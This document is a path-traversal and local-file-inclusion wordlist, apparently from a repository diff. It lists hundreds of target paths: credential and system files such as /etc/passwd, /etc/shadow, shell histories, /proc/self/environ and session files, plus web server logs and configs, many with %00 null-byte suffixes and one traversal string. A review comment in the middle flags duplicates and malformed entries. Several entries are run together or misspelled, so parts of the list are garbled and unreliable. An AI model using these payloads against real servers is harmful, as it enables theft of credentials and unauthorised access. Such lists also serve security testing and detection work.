/etc/inittab
/etc/issue
/etc/issue
/etc/logrotate.d/ftp
/etc/logrotate.d/ftp
/etc/logrotate.d/ftp%00
/etc/logrotate.d/proftpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/proftpd%00
/etc/logrotate.d/vsftpd.log
/etc/logrotate.d/vsftpd.log
/etc/logrotate.d/vsftpd.log%00
/etc/master.passwd
/etc/motd
/etc/motd
/etc/my.cnf
/etc/my.cnf
/etc/my.cnf%00
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf%00
/etc/nginx.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-available/default
/etc/nginx/sites-enabled/default
/etc/pam.d/proftpd
/..\..\\..\..\\..\..\\..\..\\\/etc/passwd
/etc/passwd
/etc/passwd
/etc/passwd%00
etc/passwd%00
/etc/php4.4/fcgi/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4.4/fcgi/php.ini%00
/etc/php4/apache2/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache2/php.ini%00
/etc/php4/apache/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache/php.ini%00
/etc/php4/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php4/cgi/php.ini%00
/etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini%00
/etc/php5/apache/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache/php.ini%00
/etc/php5/cgi/php.ini
/etc/php5/cgi/php.ini
/etc/php5/cgi/php.ini%00
/etc/php/apache2/php.ini
/etc/php/apache2/php.ini
/etc/php/apache2/php.ini%00
/etc/php/apache/php.ini
/etc/php/apache/php.ini
/etc/php/apache/php.ini%00
/etc/php/cgi/php.ini
/etc/php/cgi/php.ini
/etc/php/cgi/php.ini%00
/etc/php.ini
/etc/php.ini
/etc/php.ini%00
/etc/phpmyadmin/config.inc.php
/etc/php/php4/php.ini
/etc/php/php4/php.ini
/etc/php/php4/php.ini%00
/etc/php/php.ini
/etc/php/php.ini
/etc/php/php.ini%00
/etc/proftp.conf
/etc/proftp.conf
/etc/proftp.conf%00
/etc/proftpd/modules.conf
/etc/proftpd/modules.conf
/etc/proftpd/modules.conf%00
/etc/protpd/proftpd.conf
/etc/protpd/proftpd.conf
/etc/protpd/proftpd.conf%00
/etc/pure-ftpd.conf
/etc/pure-ftpd.conf
/etc/pure-ftpd.conf%00
/etc/pureftpd.passwd
/etc/pureftpd.passwd
/etc/pureftpd.passwd%00
/etc/pureftpd.pdb
/etc/pureftpd.pdb
/etc/pureftpd.pdb%00
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf%00
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.pdb%00
/etc/pure-ftpd/pureftpd.pdb%00
/etc/redhat-release
/etc/release
/etc/security/environ
/etc/security/environ
/etc/security/environ%00
/etc/security/group
/etc/security/group
/etc/security/group%00
/etc/security/limits
/etc/security/limits
/etc/security/limits%00
/etc/security/passwd
/etc/security/passwd
/etc/security/passwd%00
/etc/security/user
/etc/security/user
/etc/security/user%00
/etc/shadow
/etc/shadow~
/etc/shadow
/etc/shadow%00
/etc/ssh/sshd_config
/etc/sysconfig/network-scripts/ifcfg-eth0
/etc/vhcs2/proftpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf%00
/etc/vsftpd.chroot_list
/etc/vsftpd.chroot_list
/etc/vsftpd.chroot_list%00
/etc/vsftpd.conf
/etc/vsftpd.conf
/etc/vsftpd.conf%00
/etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd.conf%00
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftpaccess%00
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftphosts%00
/etc/wu-ftpd/ftpusers
/etc/wu-ftpd/ftpusers
/etc/wu-ftpd/ftpusers%00
/home2\bin\stable\apache\php.ini
/home2\bin\stable\apache\php.ini
/home2\bin\stable\apache\php.ini%00
/home\bin\stable\apache\php.ini
/home\bin\stable\apache\php.ini
/home\bin\stable\apache\php.ini%00
\log\access_log
\log\access.log
\log\error_log
\log\error.log
\log\httpd\access_log
\log\httpd\error_log
/logs/access_log
/logs/access_log
/logs/access.log
/logs/access.log
\logs\access_log
\logs\access.log
/logs/access.log%00
/logs/error_log
/logs/error_log
/logs/error.log
/logs/error.log
\logs\error_log
\logs\error.log
/logs/error.log%00
\logs\httpd\access_log
\logs\httpd\error_log
/logs/pure-ftpd.log
/logs/pure-ftpd.log
/logs/pure-ftpd.log%00
\mysql\bin\my.ini
/NetServer\bin\stable\apache\php.ini
/NetServer\bin\stable\apache\php.ini
/NetServer\bin\stable\apache\php.ini%00
/opt/apache2/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/opt/apache2/conf/httpd.conf%00
/opt/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf%00
/opt/lampp/logs/access_log
/opt/lampp/logs/access_log
/opt/lampp/logs/access.log
/opt/lampp/logs/access.log
/opt/lampp/logs/access_log%00
/opt/lampp/logs/access.log%00
/opt/lampp/logs/error_log
/opt/lampp/logs/error_log
/opt/lampp/logs/error.log
/opt/lampp/logs/error.log
/opt/lampp/logs/error_log%00
/opt/lampp/logs/error.log%00
/opt/xampp/etc/php.ini
/opt/xampp/etc/php.ini
/opt/xampp/etc/php.ini%00
/opt/xampp/logs/access_log
/opt/xampp/logs/access_log
/opt/xampp/logs/access.log
/opt/xampp/logs/access.log
\opt\xampp\logs\access_log
\opt\xampp\logs\access.log
/opt/xampp/logs/access_log%00
/opt/xampp/logs/access.log%00
/opt/xampp/logs/error_log
/opt/xampp/logs/error_log
/opt/xampp/logs/error.log
/opt/xampp/logs/error.log
\opt\xampp\logs\error_log
\opt\xampp\logs\error.log
/opt/xampp/logs/error_log%00
/opt/xampp/logs/error.log%00
/php4\php.ini
/php4\php.ini
/php4\php.ini%00
/php5\php.ini
/php5\php.ini
/php5\php.ini%00
php://input
/php\php.ini
/php\php.ini
/PHP\php.ini
/PHP\php.ini
/php\php.ini%00
/PHP\php.ini%00
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf%00
/private/etc/httpd/httpd.conf.default
/private/etc/httpd/httpd.conf.default
/private/etc/httpd/httpd.conf.default%00
/proc/cmdline
/proc/self/cmdline
/proc/self/environ
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/2
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/self/fd/255
/proc/self/fd/26
/proc/self/fd/27
/proc/self/fd/28
/proc/self/fd/29
/proc/self/fd/3
/proc/self/fd/30
/proc/self/fd/31
/proc/self/fd/32
/proc/self/fd/33
/proc/self/fd/34
/proc/self/fd/35/etc/passwd%00
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/stat
/proc/self/status
/proc/version
/Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\Apache Group\Apache2\conf\httpd.conf
\Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\Apache Group\Apache2\conf\httpd.conf%00
/Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache\conf\httpd.conf
\Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache\conf\httpd.conf%00
/Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\access.log
\Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\access.log%00
/Program Files\Apache Group\Apache\logs\error.log
/Program Files\Apache Group\Apache\logs\error.log
\Program Files\Apache Group\Apache\logs\error.log
/Program Files\Apache Group\Apache\logs\error.log%00
/Program Files\xampp\apache\conf\httpd.conf
/Program Files\xampp\apache\conf\httpd.conf
/Program Files\xampp\apache\conf\httpd.conf%00
\Program Files\xampp\apache\conf\httpd.confetc/passwd
/root/.bash_history
/tmp/sess_<sessid>
/usr/apache2/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/apache2/conf/httpd.conf%00
/usr/apache/conf/httpd.conf
/usr/apache/conf/httpd.conf
/usr/apache/conf/httpd.conf%00
/usr/etc/pure-ftpd.conf
/usr/etc/pure-ftpd.conf
/usr/etc/pure-ftpd.conf%00
/usr/lib/php.ini
/usr/lib/php.ini
/usr/lib/php.ini%00
/usr/lib/php/php.ini
/usr/lib/php/php.ini
/usr/lib/php/php.ini%00
/usr/lib/security/mkuser.default
/usr/lib/security/mkuser.default
/usr/lib/security/mkuser.default%00
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf%00
/usr/local/apache2/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/httpd.conf%00
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access_log%00
/usr/local/apache2/logs/access.log%00
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error_log%00
/usr/local/apache2/logs/error.log%00
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/httpd.conf%00
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/php.ini%00
/usr/local/apache/httpd.conf
/usr/local/apache/httpd.conf
/usr/local/apache/httpd.conf%00
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_ log%00
/usr/local/apache/logs/access_log%00
/usr/local/apache/logs/access. log%00
/usr/local/apache/logs/access.log%00
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log%00
/usr/local/apache/logs/error.log%00
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf%00
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf%00
/usr/local/cpanel/logs
/usr/local/cpanel/logs
/usr/local/cpanel/logs%00
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/access_log%00
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/error_log%00
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/license_log%00
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/login_log%00
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats_log%00
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf%00
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf%00
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache/vhosts.conf%00
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf%00
/usr/local/etc/php.ini
/usr/local/etc/php.ini
/usr/local/etc/php.ini%00
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf%00
/usr/local/etc/pureftpd.pdb
/usr/local/etc/pureftpd.pdb
/usr/local/etc/pureftpd.pdb%00
/usr/local/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf%00
/usr/local/lib/php.ini
/usr/local/lib/php.ini
/usr/local/lib/php.ini%00
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf%00
/usr/local/php4/httpd.conf.php
/usr/local/php4/httpd.conf.php
/usr/local/php4/httpd.conf.php%00
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini%00
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf%00
/usr/local/php5/httpd.conf.php
/usr/local/php5/httpd.conf.php
/usr/local/php5/httpd.conf.php%00
/usr/local/php5/lib/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/lib/php.ini%00
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf%00
/usr/local/php/httpd.conf.php
/usr/local/php/httpd.conf.php
/usr/local/php/httpd.conf.php%00
/usr/local/php/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php/lib/php.ini%00
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pure-ftpd.conf%00
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb%00
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/sbin/pure-config.pl%00
/usr/local/Zend/etc/php.ini
/usr/local/Zend/etc/php.ini
/usr/local/Zend/etc/php.ini%00
/usr/pkgsrc/net/pureftpd/
/usr/pkgsrc/net/pureftpd/
/usr/pkgsrc/net/pureftpd/%00
/usr/ports/contrib/pure-ftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/contrib/pure-ftpd/%00
/usr/ports/ftp/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/ftp/pure-ftpd/%00
/usr/ports/net/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/ports/net/pure-ftpd/%00
/usr/sbin/pure-config.pl
/usr/sbin/pure-config.pl
/usr/sbin/pure-config.pl%00
/var/adm/lastlog
/var/adm/log/xferlog
/var/adm/log/xferlog
/var/adm/log/xferlog%00
/var/adm/messages
/var/adm/messages.0
/var/adm/messages.1
/var/adm/messages.2
/var/adm/messages.3
/var/adm/utmpx
/var/adm/wtmpx
/var/cpanel/cpanel.config
/var/cpanel/cpanel.config
/var/cpanel/cpanel.config%00
/var/db/shadow/hash
/var/lib/mysql/my.cnf
/var/lib/mysql/my.cnf
/var/lib/mysql/my.cnf%00
/var/lib/php5/session/sess_<sessid>
/var/lib/php/session/sess_<sessid>
/var/local/www/conf/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/php.ini%00
/var/log/access_log
/var/log/access_log
/var/log/access_log
/var/log/access.log
/var/log/access.log
/var/log/access.log
/var/log/access_log%00
/var/log/access.log%00
/var/log/apache2/access_log
/var/log/apache2/access_log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/access.log
/var/log/apache2/access_log%00
/var/log/apache2/access.log%00
/var/log/apache2/error_log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/error.log
/var/log/apache2/error.log
/var/log/apache2/error_log%00
/var/log/apache2/error.log%00
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/access.log
/var/log/apache/access_log%00
/var/log/apache/access.log%00
/var/log/apache/error_log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error_log%00
/var/log/apache/error.log%00
/var/log/authlog
/var/log/auth.log
/var/log/auth.log.0
/var/log/auth.log.0.gz
/var/log/auth.log.1
/var/log/auth.log.1.gz
/var/log/auth.log.2
/var/log/auth.log.2.gz
/var/log/auth.log.3
/var/log/auth.log.3.gz
/var/log/error_log
/var/log/error_log
/var/log/error.log
/var/log/error.log
/var/log/error_log%00
/var/log/error.log%00
/var/log/exim_mainlog
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim/mainlog
/var/log/exim_mainlog%00
/var/log/exim/mainlog%00
/var/log/exim_paniclog
/var/log/exim_paniclog
/var/log/exim/paniclog
/var/log/exim/paniclog
/var/log/exim_paniclog%00
/var/log/exim/paniclog%00
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/exim/rejectlog
/var/log/exim/rejectlog%00
/var/log/exim_rejectlog%00/etc/issue
/var/log/exim_rejectlog/etc/passwd
/var/log/ftplog
/var/log/ftplog
/var/log/ftplog%00
/var/log/ftp-proxy
/var/log/ftp-proxy
/var/log/ftp-proxy%00
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy/ftp-proxy.log%00
/var/log/httpd/access_log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/access_log%00
/var/log/httpd/access.log%00
/var/log/httpd/error_log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpd/error_log%00
/var/log/httpd/error.log%00
/var/log/kernel.log
/var/log/lastlog
/var/log/maillog
/var/log/mail.log
/var/log/maillog
/var/log/maillog%00
/var/log/messages
/var/log/messages.0
/var/log/messages.0.gz
/var/log/messages.1
/var/log/messages.1.gz
/var/log/messages.2
/var/log/messages.2.gz
/var/log/messages.3
/var/log/messages.3.gz
/var/log/messages.log
/var/log/mysqlderror.log
/var/log/mysqlderror.log
/var/log/mysqlderror.log%00
/var/log/mysql.log
/var/log/mysql.log
/var/log/mysql.log%00
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-bin.log%00
/var/log/mysql/mysql.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql.log%00
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log%00
/var/log/nginx/access_log
/var/log/nginx/access_log
/var/log/nginx/access_log
/var/log/nginx/access.log
/var/log/nginx/access.log
/var/log/nginx/access_log%00
/var/log/nginx/access.log%00
/var/log/nginx/error_log
/var/log/nginx/error_log
/var/log/nginx/error.log
/var/log/nginx/error.log
/var/log/nginx/error.log
/var/log/nginx/error_log%00
/var/log/nginx/error.log%00
/var/log/proftpd
/var/log/proftpd
/var/log/proftpd%00
/var/log/pureftpd.log
/var/log/pureftpd.log
/var/log/pureftpd.log%00
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pure-ftpd/pure-ftpd.log%00
/var/log/secure.log
/var/log/syslog
/var/log/syslog.0
/var/log/syslog.0.gz
/var/log/syslog.1
/var/log/syslog.1.gz
/var/log/syslog.2
/var/log/syslog.2.gz
/var/log/syslog.3
/var/log/syslog.3.gz
/var/log/syslog.log
/var/log/vsftpd.log
/var/log/vsftpd.log
/var/log/vsftpd.log%00
/var/log/wtmp
/var/log/xferlog
/var/log/xferlog
/var/log/xferlog%00
/var/mail/apache
/var/mail/nobody
/var/mail/www
/var/mail/www-data
/var/mysql.log
/var/mysql.log
/var/mysql.log%00
/var/root/.bash_history
/var/root/.sh_history
/var/run/utmp
/var/www/.bash_history
/var/www/conf/httpd.conf
/var/www/conf/httpd.conf
/var/www/conf/httpd.conf%00
/var/www/config.php
/var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access.log
/var/www/logs/access.log
/var/www/logs/access_log%00
/var/www/logs/access.log%00
/var/www/logs/error_log
/var/www/logs/error_log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error_log%00
/var/www/logs/error.log%00
/var/www/mgr/logs/access_log
/var/www/mgr/logs/access.log
/var/www/mgr/logs/error_log
/var/www/mgr/logs/error.log
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/opt/apache2/conf/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/Volumes/webBackup/private/etc/httpd/httpd.conf.default%00
/web/conf/php.ini
/web/conf/php.ini
/web/conf/php.ini%00
/WINDOWS\php.ini
/WINDOWS\php.ini
/WINDOWS\php.ini%00
/WINNT\php.ini
/WINNT\php.ini
/WINNT\php.ini%00
/www/logs/proftpd.system.log
/www/logs/proftpd.system.log
/www/logs/proftpd.system.log%00
/xampp\apache\bin\php.ini
/xampp\apache\bin\php.ini
/xampp\apache\bin\php.ini%00
\xampp\apache\conf\httpd.conf
\xampp\apache\logs\access.log
\xampp\apache\logs\error.log
\xampp\FileZillaFTP\FileZilla Server.xml
\xampp\FileZillaFTP\Logs
\xampp\FileZillaFTP\Logs\access.log
\xampp\FileZillaFTP\Logs\error.log
\xampp\MercuryMail\LOGS\access.log
\xampp\MercuryMail\LOGS\error.log
\xampp\MercuryMail\mercury.ini
\xampp\mysql\data\mysql.err
\xampp\phpmyadmin\config.inc
\xampp\phpMyAdmin\config.inc
\xampp\phpmyadmin\config.inc.php
\xampp\phpMyAdmin\config.inc.php
\xampp\phpmyadmin\phpinfo.php
\xampp\phpMyAdmin\phpinfo.php
\xampp\php\php.ini
\xampp\sendmail\sendmail.ini
\xampp\sendmail\sendmail.log
\xampp\tomcat\conf\tomcat-users.xml
\xampp\tomcat\conf\web.xml
\xampp\webalizer\webalizer.conf
\xampp\webdav\webdav.txt
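Review bot: Four entries in this list look like two paths run together without a line break: `/proc/self/fd/35/etc/passwd%00`, `\Program Files\xampp\apache\conf\httpd.confetc/passwd`, `/var/log/exim_rejectlog%00/etc/issue` and `/var/log/exim_rejectlog/etc/passwd`. The two entries `/usr/local/apache/logs/access_ log%00` and `/usr/local/apache/logs/access. log%00` also carry a stray space, so each of these should be split or corrected to keep the file at one path per line. Many of the 911 lines are exact repeats (`/etc/passwd` appears twice and `/apache/logs/access.log` three times in a row), so a `sort -u` pass would shrink the file without losing any distinct entry; the same repetition and the same stray-space entries recur in the 319-line `%00` list that follows. Anyone reusing these lists as WAF or log-detection signatures should keep in mind that the `%00` suffix variants only matter on runtimes that truncate a path at a NUL byte, which modern PHP releases reject.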


@ -0,0 +1,319 @@
/etc/passwd%00
/etc/passwd%00
/etc/shadow%00
/etc/group%00
/etc/security/group%00
/etc/security/passwd%00
/etc/security/user%00
/etc/security/environ%00
/etc/security/limits%00
/usr/lib/security/mkuser.default%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/var/www/logs/access_log%00
/var/www/logs/access.log%00
/usr/local/apache/logs/access_ log%00
/usr/local/apache/logs/access. log%00
/var/log/apache/access_log%00
/var/log/apache2/access_log%00
/var/log/apache/access.log%00
/var/log/apache2/access.log%00
/var/log/access_log%00
/var/log/access.log%00
/var/www/logs/error_log%00
/var/www/logs/error.log%00
/usr/local/apache/logs/error_log%00
/usr/local/apache/logs/error.log%00
/var/log/apache/error_log%00
/var/log/apache2/error_log%00
/var/log/apache/error.log%00
/var/log/apache2/error.log%00
/var/log/error_log%00
/var/log/error.log%00
/var/log/httpd/access_log%00
/var/log/httpd/error_log%00
/var/log/httpd/access_log%00
/var/log/httpd/error_log%00
/var/log/nginx/access_log%00
/var/log/nginx/access.log%00
/var/log/nginx/error_log%00
/var/log/nginx/error.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache2/logs/error.log%00
/apache2/logs/access.log%00
/apache2/logs/error.log%00
/apache2/logs/access.log%00
/apache2/logs/error.log%00
/apache2/logs/access.log%00
/apache2/logs/error.log%00
/apache2/logs/access.log%00
/apache2/logs/error.log%00
/apache2/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/usr/local/apache/logs/access_log%00
/usr/local/apache/logs/access.log%00
/usr/local/apache/logs/error_log%00
/usr/local/apache/logs/error.log%00
/usr/local/apache2/logs/access_log%00
/usr/local/apache2/logs/access.log%00
/usr/local/apache2/logs/error_log%00
/usr/local/apache2/logs/error.log%00
/var/www/logs/access_log%00
/var/www/logs/access.log%00
/var/www/logs/error_log%00
/var/www/logs/error.log%00
/var/log/httpd/access_log%00
/var/log/httpd/access.log%00
/var/log/httpd/error_log%00
/var/log/httpd/error.log%00
/var/log/apache/access_log%00
/var/log/apache/access.log%00
/var/log/apache/error_log%00
/var/log/apache/error.log%00
/var/log/apache2/access_log%00
/var/log/apache2/access.log%00
/var/log/apache2/error_log%00
/var/log/apache2/error.log%00
/var/log/access_log%00
/var/log/access.log%00
/var/log/error_log%00
/var/log/error.log%00
/opt/lampp/logs/access_log%00
/opt/lampp/logs/error_log%00
/opt/xampp/logs/access_log%00
/opt/xampp/logs/error_log%00
/opt/lampp/logs/access.log%00
/opt/lampp/logs/error.log%00
/opt/xampp/logs/access.log%00
/opt/xampp/logs/error.log%00
/Program Files\Apache Group\Apache\logs\access.log%00
/Program Files\Apache Group\Apache\logs\error.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/apache/logs/error.log%00
/apache/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/logs/error.log%00
/logs/access.log%00
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/var/www/logs/access_log%00
/var/www/logs/access.log%00
/usr/local/apache/logs/access_log%00
/usr/local/apache/logs/access.log%00
/var/log/apache/access_log%00
/var/log/apache/access.log%00
/var/log/access_log%00
/var/www/logs/error_log%00
/var/www/logs/error.log%00
/usr/local/apache/logs/error_log%00
/usr/local/apache/logs/error.log%00
/var/log/apache/error_log%00
/var/log/apache/error.log%00
/var/log/access_log%00
/var/log/error_log%00
/usr/local/apache/conf/httpd.conf%00
/usr/local/apache2/conf/httpd.conf%00
/etc/httpd/conf/httpd.conf%00
/etc/apache/conf/httpd.conf%00
/usr/local/etc/apache/conf/httpd.conf%00
/etc/apache2/httpd.conf%00
/usr/local/apache/conf/httpd.conf%00
/usr/local/apache2/conf/httpd.conf%00
/usr/local/apache/httpd.conf%00
/usr/local/apache2/httpd.conf%00
/usr/local/httpd/conf/httpd.conf%00
/usr/local/etc/apache/conf/httpd.conf%00
/usr/local/etc/apache2/conf/httpd.conf%00
/usr/local/etc/httpd/conf/httpd.conf%00
/usr/apache2/conf/httpd.conf%00
/usr/apache/conf/httpd.conf%00
